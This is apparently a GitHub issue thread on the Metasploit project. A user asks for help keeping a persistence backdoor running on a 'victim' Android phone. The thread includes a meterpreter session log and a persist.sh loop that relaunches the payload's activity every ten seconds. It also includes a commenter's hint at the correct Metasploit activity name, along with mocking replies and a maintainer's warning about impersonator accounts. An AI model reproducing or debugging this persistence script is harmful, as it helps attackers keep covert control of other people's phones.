### ISSUE TITLE
Problem with creating android persistence backdoor

### ISSUE THREAD

**Issue by pancenko** [rapid7/metasploit-framework#13691]
## Steps to reproduce

I'm trying to make persistence backdoor, please help me to fix error type 3 or give the manual how to do it correct with android>5.0 
How'd you do it?

1. I'm get meterpreter session, then i type this code:
meterpreter > pwd
/data/user/0/com.manages.navigator/files
meterpreter > upload /root/Desktop/persist.sh
[*] uploading  : /root/Desktop/persist.sh -> persist.sh
[*] Uploaded -1.00 B of 122.00 B (-0.82%): /root/Desktop/persist.sh -> persist.sh
[*] uploaded   : /root/Desktop/persist.sh -> persist.sh
meterpreter > shell
Process 1 created.
Channel 2 created.
ls       
persist.sh
sh persist.sh
Starting: Intent { act=android.intent.action.MAIN cmp=com.manages.navigator/.MainActivity }
Error type 3
Error: Activity class {com.manages.navigator/com.manages.navigator.MainActivity} does not exist.

______________________
"persist.sh" it's a file, his code:
#!/bin/sh
while :
do am start --user 0 -a android.intent.action.MAIN -n com.manages.navigator/.MainActivity
sleep 10
done
______________________

## System stuff

Victim is Android 6.0, Kali linux 2019.4

### Metasploit version

Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install). 
Framework: 5.0.60-dev
Console  : 5.0.60-dev

**Comment by h0die** [comment]
This is bullshit!

**Comment by h0die** [comment]
@OJ, close this shit!

**Comment by h0die** [comment]
activity does not exist.

**Comment by bc0les** [comment]
Maybe this can help:
https://www.youtube.com/watch?v=72TwxRkOFB4

And tray: `com.metasploit.stage/.MainActivity`

**Comment by pancenko** [comment]
bc0les, i looked all videos on youtube before i came here. It didn't help me

**Comment by bc0les** [comment]
> bc0les, i looked all videos on youtube before i came here. It didn't help me

Look at the name of the activity.

**Comment by OJ** [comment]
Sorry @pancenko we have someone creating new accounts and trying to impersonate real members of the MSF contributor's team. Please ignore.

**Comment by bc0les** [comment]
Maybe, you need a pan?

**Comment by bc0les** [comment]
Oj, are you ok?

**Comment by harmjay** [comment]
You can't do this.

**Comment by pancenko** [comment]
> You can't do this.

Maybe you can say how to get access meterpreter session to android after session died?

**Comment by milk1number** [comment]
> ## Steps to reproduce
> 
> I'm trying to make persistence backdoor, please help me to fix error type 3 or give the manual how to do it correct with android>5.0 How'd you do it?
> 
>     1. I'm get meterpreter session, then i type this code:
>        meterpreter > pwd
>        /data/user/0/com.manages.navigator/files
>        meterpreter > upload /root/Desktop/persist.sh
>        [_] uploading  : /root/Desktop/persist.sh -> persist.sh
>        [_] Uploaded -1.00 B of 122.00 B (-0.82%): /root/Desktop/persist.sh -> persist.sh
>        [*] uploaded   : /root/Desktop/persist.sh -> persist.sh
>        meterpreter > shell
>        Process 1 created.
>        Channel 2 created.
>        ls
>        persist.sh
>        sh persist.sh
>        Starting: Intent { act=android.intent.action.MAIN cmp=com.manages.navigator/.MainActivity }
>        Error type 3
>        Error: Activity class {com.manages.navigator/com.manages.navigator.MainActivity} does not exist.
> 
> 
> "persist.sh" it's a file, his code: #!/bin/sh while : do am start --user 0 -a android.intent.action.MAIN -n com.manages.navigator/.MainActivity sleep 10 done
> ## System stuff
> 
> Victim is Android 10

same problem
so we can not create android persistent backdoor anymore?
